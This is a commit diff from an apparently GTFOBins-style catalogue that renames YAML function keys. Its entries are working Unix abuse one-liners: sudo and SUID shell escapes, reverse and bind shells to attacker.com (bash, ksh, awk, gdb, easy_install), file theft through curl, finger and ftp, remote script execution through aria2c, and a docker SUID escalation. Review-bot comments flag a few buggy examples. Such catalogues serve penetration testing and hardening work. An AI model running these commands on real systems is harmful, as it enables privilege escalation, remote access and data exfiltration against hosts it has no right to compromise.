Adopt new function names
This commit is contained in:
parent
1c77f099d3
commit
dd337b5ddf
@ -4,13 +4,13 @@
|
||||
shell:
|
||||
label: Shell
|
||||
description: |
|
||||
It can be used to break out from restricted environments by spawning an
|
||||
It can be used to break out from restricted environments by spawning an
|
||||
interactive system shell.
|
||||
|
||||
command:
|
||||
label: Command
|
||||
description: |
|
||||
It can be used to break out from restricted environments by running
|
||||
It can be used to break out from restricted environments by running
|
||||
non-interactive system commands.
|
||||
|
||||
reverse-shell:
|
||||
@ -19,8 +19,8 @@ reverse-shell:
|
||||
It can send back a reverse shell to a listening attacker to open a remote
|
||||
network access.
|
||||
|
||||
reverse-non-interactive-shell:
|
||||
label: Reverse non-interactive shell
|
||||
non-interactive-reverse-shell:
|
||||
label: Non-interactive reverse shell
|
||||
description: |
|
||||
It can send back a non-interactive reverse shell to a listening attacker to
|
||||
open a remote network access.
|
||||
@ -30,8 +30,8 @@ bind-shell:
|
||||
description: |
|
||||
It can bind a shell to a local port to allow remote network access.
|
||||
|
||||
bind-non-interactive-shell:
|
||||
label: Bind non-interactive shell
|
||||
non-interactive-bind-shell:
|
||||
label: Non-interactive bind shell
|
||||
description: |
|
||||
It can bind a non-interactive shell to a local port to allow remote network
|
||||
access.
|
||||
|
@ -1,11 +1,11 @@
|
||||
---
|
||||
description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: |
|
||||
apt-get changelog apt
|
||||
!/bin/sh
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
sudo apt-get changelog apt
|
||||
!/bin/sh
|
||||
|
@ -1,11 +1,11 @@
|
||||
---
|
||||
description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: |
|
||||
apt-get changelog apt
|
||||
!/bin/sh
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
sudo apt-get changelog apt
|
||||
!/bin/sh
|
||||
|
@ -1,7 +1,7 @@
|
||||
---
|
||||
description: Note that the subprocess is immediately sent to the background.
|
||||
functions:
|
||||
execute-non-interactive:
|
||||
command:
|
||||
- code: |
|
||||
COMMAND='id'
|
||||
TF=$(mktemp)
|
||||
@ -10,14 +10,14 @@ functions:
|
||||
aria2c --on-download-error=$TF http://x
|
||||
- description: The remote file `aaaaaaaaaaaaaaaa` (must be a string of 16 hex digit) contains the shell script. Note that said file needs to be written on disk in order to be executed. `--allow-overwrite` is needed if this is executed multiple times with the same GID.
|
||||
code: aria2c --allow-overwrite --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
COMMAND='id'
|
||||
TF=$(mktemp)
|
||||
echo "$COMMAND" > $TF
|
||||
chmod +x $TF
|
||||
./aria2c --on-download-error=$TF http://x
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
COMMAND='id'
|
||||
TF=$(mktemp)
|
||||
|
@ -1,13 +1,13 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: ash
|
||||
file-write:
|
||||
- code: |
|
||||
export LFILE=file_to_write
|
||||
ash -c 'echo DATA > $LFILE'
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: "./ash"
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo ash
|
||||
---
|
||||
|
@ -1,8 +1,8 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: awk 'BEGIN {system("/bin/sh")}'
|
||||
reverse-shell-non-interactive:
|
||||
non-interactive-reverse-shell:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
@ -11,7 +11,7 @@ functions:
|
||||
s = "/inet/tcp/0/" RHOST "/" RPORT;
|
||||
while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
|
||||
while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
|
||||
bind-shell-non-interactive:
|
||||
non-interactive-bind-shell:
|
||||
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
|
||||
code: |
|
||||
LPORT=12345
|
||||
@ -27,8 +27,8 @@ functions:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
awk '//' "$LFILE"
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo awk 'BEGIN {system("/bin/sh")}'
|
||||
suid-limited:
|
||||
limited-suid:
|
||||
- code: ./awk 'BEGIN {system("/bin/sh")}'
|
||||
---
|
||||
|
@ -4,11 +4,11 @@ functions:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
base64 "$LFILE" | base64 --decode
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./base64 "$LFILE" | base64 --decode
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo base64 "$LFILE" | base64 --decode
|
||||
|
@ -1,14 +1,14 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: bash
|
||||
reverse-shell-interactive:
|
||||
reverse-shell:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
bash -c 'bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1'
|
||||
upload:
|
||||
file-upload:
|
||||
- description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
@ -21,7 +21,7 @@ functions:
|
||||
export RPORT=12345
|
||||
export LFILE=file_to_send
|
||||
bash -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'
|
||||
download:
|
||||
file-download:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
@ -58,8 +58,8 @@ functions:
|
||||
HISTTIMEFORMAT=$'\r\e[K'
|
||||
history -r $LFILE
|
||||
history
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: "./bash -p"
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo bash
|
||||
---
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
description: BusyBox may contain many UNIX utilities, run `busybox --list-full` to check what GTFBins binaries are supported. Here some example.
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: busybox sh
|
||||
upload:
|
||||
file-upload:
|
||||
- description: Serve files in the local folder running an HTTP server.
|
||||
code: |
|
||||
export LPORT=12345
|
||||
@ -16,9 +16,9 @@ functions:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./busybox cat "$LFILE"
|
||||
suid-enabled:
|
||||
suid:
|
||||
- description: It may drop the SUID privileges depending on the compilation flags and the runtime configuration.
|
||||
code: "./busybox sh"
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo busybox sh
|
||||
---
|
||||
|
@ -4,11 +4,11 @@ functions:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
cat "$LFILE"
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./cat "$LFILE"
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo cat "$LFILE"
|
||||
|
@ -1,11 +1,11 @@
|
||||
---
|
||||
description: This can be run with elevated privileges to change permissions and then read, write, or execute a file.
|
||||
functions:
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_change
|
||||
./chmod 0777 $LFILE
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_change
|
||||
sudo chmod 0777 $LFILE
|
||||
|
@ -1,11 +1,11 @@
|
||||
---
|
||||
description: This can be run with elevated privileges to change ownership and then read, write, or execute a file.
|
||||
functions:
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_change
|
||||
./chown $(id -un):$(id -gn) $LFILE
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_change
|
||||
sudo chown $(id -un):$(id -gn) $LFILE
|
||||
|
@ -1,13 +1,13 @@
|
||||
---
|
||||
description: This can be used to copy and then read or write files from a restricted file systems or with elevated privileges.
|
||||
functions:
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
TF=$(mktemp)
|
||||
echo "DATA" > $TF
|
||||
./cp $TF $LFILE
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
TF=$(mktemp)
|
||||
|
@ -1,7 +1,7 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: cpulimit -l 100 -f /bin/sh
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo cpulimit -l 100 -f /bin/sh
|
||||
---
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-non-interactive:
|
||||
command:
|
||||
- description: The commands are executed according to the crontab file edited via the `crontab` utility.
|
||||
code: crontab -e
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- description: The commands are executed according to the crontab file edited via the `crontab` utility.
|
||||
code: sudo crontab -e
|
||||
---
|
||||
|
@ -1,13 +1,13 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: csh
|
||||
file-write:
|
||||
- code: |
|
||||
export LFILE=file_to_write
|
||||
ash -c 'echo DATA > $LFILE'
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: "./csh -b"
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo csh
|
||||
---
|
||||
|
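Review bot: The `file-write` entry in this hunk runs `ash -c 'echo DATA > $LFILE'` although this is the `csh` page (its `shell`, `suid` and `sudo` entries all invoke `csh`), which looks like it was carried over from the `ash` entry earlier in this commit; the example should exercise the binary the page documents, i.e. `csh -c 'echo DATA > $LFILE'`. The same `ash -c` line appears in the `dash` section further down, the hunk whose `shell` entry is `dash`. Neither line is touched by the key rename, so this would be a separate fix rather than part of this change.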
@ -1,12 +1,12 @@
|
||||
---
|
||||
functions:
|
||||
upload:
|
||||
file-upload:
|
||||
- description: Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Omit the `@` to send hard-coded data.
|
||||
code: |
|
||||
URL=http://attacker.com/
|
||||
LFILE=file_to_send
|
||||
curl -X POST -d @$file_to_send $URL
|
||||
download:
|
||||
file-download:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
URL=http://attacker.com/file_to_get
|
||||
@ -17,13 +17,13 @@ functions:
|
||||
code: |
|
||||
LFILE=/tmp/file_to_read
|
||||
curl file://$LFILE
|
||||
suid-enabled:
|
||||
suid:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
URL=http://attacker.com/file_to_get
|
||||
LFILE=file_to_save
|
||||
./curl $URL -o $LFILE
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
URL=http://attacker.com/file_to_get
|
||||
|
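Review bot: The `file-upload` example in the first hunk of this section sets `LFILE=file_to_send` but then runs `curl -X POST -d @$file_to_send $URL`, so the variable it actually expands is never defined and the `-d @` argument does not refer to the file the example prepares. The line should read `curl -X POST -d @$LFILE $URL`, matching the `LFILE` convention used by the other entries in this commit. This is a context line the rename does not touch, so it may warrant its own commit.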
@ -4,11 +4,11 @@ functions:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
cut -d "" -f1 "$LFILE"
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./cut -d "" -f1 "$LFILE"
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo cut -d "" -f1 "$LFILE"
|
||||
|
@ -1,13 +1,13 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: dash
|
||||
file-write:
|
||||
- code: |
|
||||
export LFILE=file_to_write
|
||||
ash -c 'echo DATA > $LFILE'
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: ./dash -p
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo dash
|
||||
---
|
||||
|
@ -8,11 +8,11 @@ functions:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
date -f $LFILE
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./date -f $LFILE
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo date -f $LFILE
|
||||
|
@ -8,11 +8,11 @@ functions:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
dd if=LFILE
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
echo "data" | ./dd of=$LFILE
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
echo "data" | sudo -E dd of=$LFILE
|
||||
|
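Review bot: The entry at the top of this hunk runs `dd if=LFILE` right after setting `LFILE=file_to_read`, so the literal string `LFILE` is passed as the input file instead of the variable's value; it should be `dd if=$LFILE`. The key this entry belongs to starts above the hunk, so only its code lines are visible here. The renamed `suid` and `sudo` entries below it use `of=$LFILE` correctly and are unaffected.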
@ -4,11 +4,11 @@ functions:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
diff --line-format=%L /dev/null $LFILE
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./diff --line-format=%L /dev/null $LFILE
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo diff --line-format=%L /dev/null $LFILE
|
||||
|
@ -2,11 +2,11 @@
|
||||
description: |
|
||||
Exploit the fact that Docker runs as root to create a SUID binary on the host using a container. This requires the user to be privileged enough to run docker, e.g. being in the `docker` group. Any other Docker Linux image should work, e.g., `debian`.
|
||||
functions:
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
sudo docker run --rm -v /home/$USER:/h_docs ubuntu \
|
||||
sh -c 'cp /bin/sh /h_docs/ && chmod +s /h_docs/sh' && ~/sh -p
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
./docker run --rm -v /home/$USER:/h_docs ubuntu \
|
||||
sh -c 'cp /bin/sh /h_docs/ && chmod +s /h_docs/sh' && ~/sh -p
|
||||
|
@ -1,11 +1,11 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: |
|
||||
TF=$(mktemp -d)
|
||||
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
|
||||
easy_install $TF
|
||||
reverse-shell-interactive:
|
||||
reverse-shell:
|
||||
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
@ -16,7 +16,7 @@ functions:
|
||||
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
|
||||
pty.spawn("/bin/sh")' > $TF/setup.py
|
||||
easy_install $TF
|
||||
upload:
|
||||
file-upload:
|
||||
- description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
|
||||
code: |
|
||||
export URL=http://attacker.com/
|
||||
@ -36,7 +36,7 @@ functions:
|
||||
else: import SimpleHTTPServer as s, SocketServer as ss
|
||||
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()' > $TF/setup.py
|
||||
easy_install $TF
|
||||
download:
|
||||
file-download:
|
||||
- description: Fetch a remote file via HTTP GET request. The file path must be absolute.
|
||||
code: |
|
||||
export URL=http://attacker.com/file_to_get
|
||||
@ -62,12 +62,12 @@ functions:
|
||||
TF=$(mktemp -d)
|
||||
echo 'print(open("file_to_read").read())' > $TF/setup.py
|
||||
easy_install $TF
|
||||
load-library:
|
||||
library-load:
|
||||
- code: |
|
||||
TF=$(mktemp -d)
|
||||
echo 'from ctypes import cdll; cdll.LoadLibrary("lib.so")' > $TF/setup.py
|
||||
easy_install $TF
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
TF=$(mktemp -d)
|
||||
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: |
|
||||
ed
|
||||
!/bin/sh
|
||||
@ -17,11 +17,11 @@ functions:
|
||||
ed file_to_read
|
||||
,p
|
||||
q
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
sudo ed
|
||||
!/bin/sh
|
||||
suid-limited:
|
||||
limited-suid:
|
||||
- code: |
|
||||
./ed
|
||||
!/bin/sh
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: emacs -Q -nw --eval '(term "/bin/sh")'
|
||||
file-write:
|
||||
- code: |
|
||||
@ -9,8 +9,8 @@ functions:
|
||||
C-x C-s
|
||||
file-read:
|
||||
- code: emacs file_to_read
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: ./emacs -Q -nw --eval '(term "/bin/sh -p")'
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo emacs -Q -nw --eval '(term "/bin/sh")'
|
||||
---
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: env /bin/sh
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: ./env /bin/sh -p
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo env /bin/sh
|
||||
---
|
||||
|
@ -5,11 +5,11 @@ functions:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
expand "$LFILE"
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./expand "$LFILE"
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo expand "$LFILE"
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: expect -c 'spawn /bin/sh;interact'
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: ./expect -c 'spawn /bin/sh -p;interact'
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo expect -c 'spawn /bin/sh;interact'
|
||||
---
|
||||
|
@ -1,11 +1,11 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: |
|
||||
TF=$(mktemp -d)
|
||||
echo 'exec("/bin/sh")' > $TF/x.rb
|
||||
FACTERLIB=$TF facter
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
TF=$(mktemp -d)
|
||||
echo 'exec("/bin/sh")' > $TF/x.rb
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: find . -exec /bin/sh \; -quit
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: ./find . -exec /bin/sh -p \; -quit
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo find . -exec /bin/sh \; -quit
|
||||
---
|
||||
|
@ -2,13 +2,13 @@
|
||||
description: |
|
||||
`finger` hangs waiting for the remote peer to close the socket.
|
||||
functions:
|
||||
upload:
|
||||
file-upload:
|
||||
- description: Send a binary file to a TCP port. Run `sudo nc -l -p 79 | base64 -d > "file_to_save"` on the attacker box to collect the file. The file length is limited by the maximum size of arguments.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
LFILE=file_to_send
|
||||
finger "$(base64 $LFILE)@$RHOST"
|
||||
download:
|
||||
file-download:
|
||||
- description: Fetch remote binary file from a remote TCP port. Run `base64 "file_to_send" | sudo nc -l -p 79` on the attacker box to send the file.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: flock -u / /bin/sh
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: ./flock -u / /bin/sh -p
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo flock -u / /bin/sh
|
||||
---
|
||||
|
@ -5,11 +5,11 @@ functions:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
fmt -pNON_EXISTING_PREFIX "$LFILE"
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./fmt -pNON_EXISTING_PREFIX "$LFILE"
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo fmt -pNON_EXISTING_PREFIX "$LFILE"
|
||||
|
@ -4,11 +4,11 @@ functions:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
fold -w99999999 "$LFILE"
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./fold -w99999999 "$LFILE"
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo fold -w99999999 "$LFILE"
|
||||
|
@ -1,22 +1,22 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: |
|
||||
ftp
|
||||
!/bin/sh
|
||||
upload:
|
||||
file-upload:
|
||||
- description: Send local file to a FTP server.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
ftp $RHOST
|
||||
put file_to_send
|
||||
download:
|
||||
file-download:
|
||||
- description: Fetch a remote file from a FTP server.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
ftp $RHOST
|
||||
get file_to_get
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
sudo ftp
|
||||
!/bin/sh
|
||||
|
@ -1,8 +1,8 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: gdb -nx -ex '!sh' -ex quit
|
||||
reverse-shell-interactive:
|
||||
reverse-shell:
|
||||
- description: This requires that GDB is compiled with Python support. Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
@ -11,7 +11,7 @@ functions:
|
||||
s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))))
|
||||
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
|
||||
pty.spawn("/bin/sh")' -ex quit
|
||||
upload:
|
||||
file-upload:
|
||||
- description: This requires that GDB is compiled with Python support. Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
|
||||
code: |
|
||||
export URL=http://attacker.com/
|
||||
@ -27,7 +27,7 @@ functions:
|
||||
if sys.version_info.major == 3: import http.server as s, socketserver as ss
|
||||
else: import SimpleHTTPServer as s, SocketServer as ss
|
||||
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()' -ex quit
|
||||
download:
|
||||
file-download:
|
||||
- description: This requires that GDB is compiled with Python support. Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
export URL=http://attacker.com/file_to_get
|
||||
@ -44,12 +44,12 @@ functions:
|
||||
file-read:
|
||||
- description: This requires that GDB is compiled with Python support.
|
||||
code: gdb -nx -ex 'python print(open("file_to_read").read())' -ex quit
|
||||
load-library:
|
||||
library-load:
|
||||
- description: This requires that GDB is compiled with Python support.
|
||||
code: gdb -nx -ex 'python from ctypes import cdll; cdll.LoadLibrary("lib.so")' -ex quit
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo gdb -nx -ex '!sh' -ex quit
|
||||
capabilities-enabled:
|
||||
capabilities:
|
||||
- description: This requires that GDB is compiled with Python support.
|
||||
code: ./gdb -nx -ex 'python import os; os.setuid(0)' -ex '!sh' -ex quit
|
||||
---
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: PAGER='sh -c "exec sh 0<&1"' git -p help
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: PAGER='sh -c "exec sh 0<&1"' sudo -E git -p help
|
||||
suid-limited:
|
||||
limited-suid:
|
||||
- code: PAGER='sh -c "exec sh 0<&1"' ./git -p help
|
||||
---
|
||||
|
@ -6,11 +6,11 @@ functions:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
grep '' $LFILE
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./grep '' $LFILE
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo grep '' $LFILE
|
||||
|
@ -4,11 +4,11 @@ functions:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
head -c1G "$LFILE"
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./head -c1G "$LFILE"
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo head -c1G "$LFILE"
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: ionice /bin/sh
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: ./ionice /bin/sh -p
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo ionice /bin/sh
|
||||
---
|
||||
|
@ -4,11 +4,11 @@ description: |
|
||||
|
||||
This might not work if run by unprivileged users depending on the system configuration.
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: |
|
||||
journalctl
|
||||
!/bin/sh
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
sudo journalctl
|
||||
!/bin/sh
|
||||
|
@ -4,11 +4,11 @@ functions:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
jq -Rr . "$LFILE"
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./jq -Rr . "$LFILE"
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo jq -Rr . "$LFILE"
|
||||
|
@ -1,14 +1,14 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: ksh
|
||||
reverse-shell-interactive:
|
||||
reverse-shell:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
ksh -c 'ksh -i > /dev/tcp/$RHOST/$RPORT 2>&1 0>&1'
|
||||
upload:
|
||||
file-upload:
|
||||
- description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
@ -21,7 +21,7 @@ functions:
|
||||
export RPORT=12345
|
||||
export LFILE=file_to_send
|
||||
ksh -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'
|
||||
download:
|
||||
file-download:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
@ -49,8 +49,8 @@ functions:
|
||||
code: |
|
||||
export LFILE=file_to_read
|
||||
ksh -c $'read -r -d \x04 < "$LFILE"; echo "$REPLY"'
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: ./ksh -p
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo ksh
|
||||
---
|
||||
|
@ -7,10 +7,10 @@ description: |
|
||||
/lib64/ld-linux-x86-64.so.2
|
||||
```
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: /lib/ld.so /bin/sh
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: ./ld.so /bin/sh -p
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo /lib/ld.so /bin/sh
|
||||
---
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: |
|
||||
less /etc/profile
|
||||
!/bin/sh
|
||||
@ -14,10 +14,10 @@ functions:
|
||||
echo DATA | less
|
||||
sfile_to_write
|
||||
q
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
sudo less /etc/profile
|
||||
!/bin/sh
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: ./less file_to_read
|
||||
---
|
||||
|
@ -1,7 +1,7 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: ltrace -b -L /bin/sh
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo ltrace -b -L /bin/sh
|
||||
---
|
||||
|
